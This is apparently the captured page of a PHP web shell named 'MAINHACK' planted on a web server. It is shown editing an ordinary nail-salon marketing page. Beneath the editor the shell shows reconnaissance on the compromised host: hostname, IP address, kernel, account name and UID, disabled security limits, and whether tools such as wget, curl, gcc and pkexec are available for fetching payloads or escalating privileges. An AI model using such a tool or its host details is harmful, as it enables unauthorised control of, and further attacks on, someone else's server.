[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: nails-software.php
<!DOCTYPE html> <html lang="en"> <head> <!-- Required Meta Tags Always Come First --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <!-- Title --> <title>Nails Software | The Salon Friend</title> <link rel="shortcut icon" href="assets/icon.png" type="image/x-icon"> <link rel="icon" href="assets/icon.png" type="image/x-icon"> <!-- Font --> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600&display=swap" rel="stylesheet"> <!-- CSS Implementing Plugins --> <link rel="stylesheet" href="assets/vendor/bootstrap-icons/font/bootstrap-icons.css"> <link rel="stylesheet" href="assets/vendor/hs-mega-menu/dist/hs-mega-menu.min.css"> <!-- CSS Unify Template --> <link rel="stylesheet" href="assets/css/theme.min.css"> </head> <body> <!-- ========== HEADER ========== --> <?php include("includes/header.php");?> <br /><br /> <br /><br /> <br /> <!-- ========== END HEADER ========== --> <!-- ========== MAIN CONTENT ========== --> <main id="content" role="main"> <!-- Hero --> <div class="container"> <div class="row position-relative"> <div class="position-md-absolute top-0 col-md-8 offset-md-4 h-100"> <div class="bg-img-center h-100" style="background-image: url(assets/nail.jpeg); min-height: 20rem;"></div> </div> <!-- End Col --> <div class="col-10 col-md-7 col-lg-6 offset-1 offset-md-0 content-space-md-1"> <div class="position-relative bg-white rounded-3 zi-1 py-6 pe-6"> <div class="mb-5"> <h1>Nail Salon Software<br/> is an entirely software to manage your business </h1> </div> </div> </div> <!-- End Col --> </div> <!-- End Row --> </div> <!-- End Hero --> <!-- Description --> <div class="container content-space-t-md-2 content-space-b-2"> <div id="listOfSocialLinks" class="position-relative"> <div class="row mb-3"> <div class="col-10 col-md-7 col-lg-6 offset-1 offset-md-4"> <h3>Nail Salon Software that acts as your personal assistant. You take care of your customers, we manage the rest</h3> <p>With our system, you can dedicate your complete attention to your customers while removing the stress associated with salon management. This powerful solution ensures that all your essential data is readily accessible, appointment reminders are automatically sent to clients, and the occurrence of no-shows is effectively minimized. By taking care of these crucial tasks, MioSalon enables you to prioritize customer satisfaction and provide a seamless salon experience..</p> </div> <!-- End Col --> </div> <!-- End Row --> <div class="row mb-3"> <div class="col-10 col-md-7 col-lg-6 offset-1 offset-md-4"> <h4>Endless Possibilities</h4> <p>To make your barbershop unique, prioritize providing a customized and tailored experience. Thesalonfriend enables you to achieve just that. How does it work? By utilizing the software, you can store your clients' preferred barber/stylist, specific haircuts, fades, and other details, ensuring that each time they visit, they receive the same exceptional service. Being aware of your clients' preferences enables you to consistently create a personalized experience for them.</p> </div> <!-- End Col --> </div> <div class="row mb-3"> <div class="col-10 col-md-7 col-lg-6 offset-1 offset-md-4"> <h4>Self-booking is the way to go</h4> <p>Offer your clients a convenient and gratifying appointment booking experience by eliminating the need to wait on the phone. Empower them with the freedom to self-book appointments through MioSalon's online scheduling feature. They can effortlessly view the available time slots and select a preferred time and stylist that perfectly fits their needs. In addition to 24/7 booking accessibility, the software also automates appointment reminders, ensuring that your clients never miss their scheduled appointments</p> </div> <!-- End Col --> </div> <div class="row mb-3"> <div class="col-10 col-md-7 col-lg-6 offset-1 offset-md-4"> <h4>Trim down the effort to run your barbershop</h4> <p>With our system, you have access to a comprehensive set of features that streamline operations, boost efficiency, minimize no-shows, effectively handle customers, and monitor vital business metrics. This cloud-based software offers a seamless experience and has gained the trust of barbershop owners worldwide. It equips you with the tools necessary to save time, enhance productivity, and effectively manage your business.</p> </div> <!-- End Col --> </div> <!-- End Row --> <div id="stickyBlockStartPoint"> <!-- Socials --> <div class="js-sticky-block col-md-3 col-lg-4" data-hs-sticky-block-options='{ "parentSelector": "#stickyBlockStartPoint", "targetSelector": "#header", "breakpoint": "md", "startPoint": "#listOfSocialLinks", "endPoint": "#stickyBlockEndPoint", "stickyOffsetTop": 20 }'> <ul class="list-unstyled list-py-1 position-md-absolute top-0 start-0 mt-5 mt-md-0"> <li><a class="link link-secondary" href="#"> <div class="d-flex"> <div class="flex-shrink-0"> <i class="bi-facebook"></i> </div> <div class="flex-grow-1 ms-2"> <span>Facebook</span> </div> </div> </a></li> <li><a class="link link-secondary" href="#"> <div class="d-flex"> <div class="flex-shrink-0"> <i class="bi-linkedin"></i> </div> <div class="flex-grow-1 ms-2"> <span>Linkedin</span> </div> </div> </a></li> <li><a class="link link-secondary" href="#"> <div class="d-flex"> <div class="flex-shrink-0"> <i class="bi-twitter"></i> </div> <div class="flex-grow-1 ms-2"> <span>Twitter</span> </div> </div> </a></li> </ul> </div> <!-- End Socials --> </div> </div> <!-- End Sticky End Point --> <div id="stickyBlockEndPoint"></div> </div> <!-- End Description --> </main> <!-- ========== END MAIN CONTENT ========== --> <!-- ========== FOOTER ========== --> <?php include("includes/footer.php");?> <!-- ========== END FOOTER ========== --> <!-- ========== SECONDARY CONTENTS ========== --> <!-- Go To --> <a class="js-go-to go-to position-fixed" href="javascript:;" style="visibility: hidden;" data-hs-go-to-options='{ "offsetTop": 700, "position": { "init": { "right": "2rem" }, "show": { "bottom": "2rem" }, "hide": { "bottom": "-2rem" } } }'> <i class="bi-chevron-up"></i> </a> <!-- ========== END SECONDARY CONTENTS ========== --> <!-- JS Global Compulsory --> <script src="assets/vendor/bootstrap/dist/js/bootstrap.bundle.min.js"></script> <!-- JS Implementing Plugins --> <script src="assets/vendor/hs-header/dist/hs-header.min.js"></script> <script src="assets/vendor/hs-mega-menu/dist/hs-mega-menu.min.js"></script> <script src="assets/vendor/hs-go-to/dist/hs-go-to.min.js"></script> <script src="assets/vendor/hs-sticky-block/dist/hs-sticky-block.min.js"></script> <!-- JS Unify --> <script src="assets/js/theme.min.js"></script> <!-- JS Plugins Init. --> <script> (function() { // INITIALIZATION OF NAVBAR // ======================================================= new HSHeader('#header').init() // INITIALIZATION OF MEGA MENU // ======================================================= const megaMenu = new HSMegaMenu('.js-mega-menu', { desktop: { position: 'left' } }) // INITIALIZATION OF STICKY BLOCKS // ======================================================= new HSStickyBlock('.js-sticky-block', { targetSelector: document.getElementById('header').classList.contains('navbar-fixed') ? '#header' : null }) // INITIALIZATION OF GO TO // ======================================================= new HSGoTo('.js-go-to') })() </script> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.82 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002